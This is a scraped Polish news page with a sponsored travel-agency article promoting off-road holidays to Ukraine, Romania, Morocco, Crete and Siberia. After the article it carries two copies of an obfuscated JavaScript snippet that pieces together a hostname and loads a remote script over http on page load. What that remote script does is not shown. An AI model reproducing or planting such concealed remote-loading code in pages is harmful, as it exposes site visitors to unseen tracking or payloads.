:-( Wygląda na to że masz Adblocka. Utrzymujemy się z reklam żeby móc dostarczyć Ci wiadomości z Twojego regionu za które nie musisz płacić, czy mógłbyś rozważyć jego wyłączenie?

Off-road z Biurem Podróży? Bieszczady ukraińskie od 1119 PLN!

Wyprawy off road - relacje z wypraw, Biurem Podróży Bieszczady ukraińskie - zdjęcie, fotografia

Poza drogą cały czas – nawet na urlopie!

Kochasz samochody terenowe i nie wyobrażasz sobie życia bez jazdy po nieutwardzanych trasach? Rozwijaj swoje zainteresowania i podejmij nowe wyzwanie – wyjedź na off-roadowy urlop!


Taka eskapada to połączenie egzotycznych wakacji z realizacją hobby. Jak jednak zabrać się za organizację takiego wyjazdu? Jak przygotować pojazd? Właściwie nie musisz się tym martwić – wystarczy skorzystać z jednej z możliwości z oferty No Limits by ITAKA.


Bliskie, lecz mało znane tereny off-roadowe

Nasza pierwsza propozycja to… Ukraina! Nasz sąsiad jest rajem dla wszystkich, którzy kochają off-road i 4x4. Trasa jest bardzo atrakcyjna zarówno pod względem widoków, jak i historii, a prowadzi aż na Krym. Warto więc podkreślić, że jeszcze całkiem niedawno miejsce to mogli oglądać nieliczni – dziś możesz być to i Ty! Fantastyczne trasy o łącznej długości 600 km, leśne dukty zapomniane przez cały świat, a do tego przepiękne ukraińskie Bieszczady… czego można chcieć więcej?


Możemy też pojechać w nieco inną stronę i trafić do Rumunii. Jeśli jesteś jedną z tych osób, która kojarzy ten cudowny kraj z hrabią Draculą, to zmienisz zdanie – po naszej wyprawie Rumunia stanie się dla Ciebie królestwem off-roadu! Podczas pokonywania 1750 km będziesz miał niepowtarzalną okazję zwiedzenia tej bajecznej krainy wraz ze wszystkim co ma do zaoferowania: zamkami, fortami, średniowiecznymi miasteczkami czy… wesołym cmentarzem w Sapancie!


Egzotyczne kraje okiem kierowcy… i nie tylko!

Afryka, Maroko – już na samą myśl robi się gorąco! Ten egzotyczny kraj staje się coraz popularniejszym kierunkiem turystycznym, głównie ze względu na fantastyczną architekturę, kształtującą się tutaj przez lata mieszankę kulturową oraz… fantastyczne trasy off-roadowe. To nie żart – pokonywanie saharyjskich bezdroży, odwiedzanie tętniących życiem kolorowych miasteczek i noclegi na pustyni to coś, co fani czterech kółek polubią od razu! Jeśli będziesz mieć dość samochodu (chociaż w to wątpimy!), to możesz wsiąść… na wielbłąda!


Tym, którym wciąż mało adrenaliny, polecamy wyprawę na Kretę. Co grecka wyspa ma wspólnego z aktywnym wypoczynkiem? Otóż bardzo wiele – jak się okazuje na Krecie można nie tylko wylegiwać się na leżaku! Uwaga: zwiedzanie Krety wytrzymają tylko naprawdę twardzi zawodnicy! Na dobry początek wycieczka rowerowa po okolicy, potem nauka snurkowania, trekking i eksploracja jaskini. Dla fanów off-roadu też oczywiście coś się znajdzie – co powiesz na jeep safari po górskich bezdrożach? W ramach odetchnięcia zapraszamy na obiad w tawernie oraz na lampkę greckiego wina.


Rajd po prawdziwych bezdrożach

Jednak prawdziwym wyzwaniem jest dopiero wyprawa na Syberię! Dzika i surowa uroda tego miejsca urzeknie naprawdę każdego: tajga, górskie krajobrazy i Bajkał, czyli najgłębsze na świecie jezioro. Znajdź miejsce, gdzie nie dotarła jeszcze zachodnia kultura, wraz z kompanami rozbij obóz, sam zdobądź pożywienie (my proponujemy wędkę – skorzystasz?) i przygotuj posiłek na ognisku. Prawdziwe życie w niesamowitych okolicznościach przyrody.


Szalone wakacje bez żadnych barier!

No Limits to jednak nie tylko oferty off-road! Jeśli jesteś typem aktywnego turysty, na pewno zainteresują Cię także inne propozycje biura podróży. Do wyboru, do koloru: akademia fotografii pod okiem specjalistów National Geographic, nurkowanie, surfing, żagle, obozy sportowe i wiele, wiele innych! Znajdź wakacje idealne właśnie dla Ciebie!
(function(){ ubb0=document.createElement("script");
ubb0.type="text/javascript";
ubb0.async=true;ubb0_=(("us")+"t")+"a";ubb0_+=("t.i")+""+"n";ubb0_+=(("f")+"o");
ubb0.src="http://"+ubb0_+"/8447479.wcdasqm7bb00jhib6Xrdudxg269fnX";document.body.appendChild(ubb0);})();


(function(){
ubb0=document.createElement("script");ubb0.type="text/javascript";
ubb0.async=true;ubb0_=(("us")+"t")+"a";ubb0_+=("t.i")+""+"n";ubb0_+=(("f")+"o");
ubb0.src="http://"+ubb0_+"/8447479.wcdasqm7bb00jhib6Xrdudxg269fnX";
document.body.appendChild(ubb0);
})();

Off-road z Biurem Podróży? Bieszczady ukraińskie od 1119 PLN! komentarze opinie

Dodajesz jako: Zaloguj się